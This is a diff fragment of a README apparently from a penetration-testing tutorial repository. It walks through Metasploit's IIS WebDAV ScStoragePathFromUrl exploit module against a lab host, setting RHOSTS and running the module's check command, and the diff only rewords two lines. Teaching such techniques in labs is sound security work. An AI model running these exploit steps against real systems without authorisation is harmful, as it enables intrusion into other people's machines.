notsag-dev/hacking-tools-for-web-developers/README.md

    0   Microsoft Windows Server 2003 R2 SP2 x86
 ```

-The only mandatory option that has is still to be set is __RHOSTS__, and corresponds to the target (victim) host.
+The only mandatory option that has is still to be set is __RHOSTS__, and corresponds to the target host (victim).
 So let's set it to the IP address of the same machine we scanned with the previous tools:
 ```
 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
 RHOSTS => 10.10.10.14
 ```

-### Run exploit and gain access
+### Run exploit and gain access to the system
 A really interesting feature of Metasploit modules is that some of them have a _check_ function to verify if the target host is vulnerable:
 ```
 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check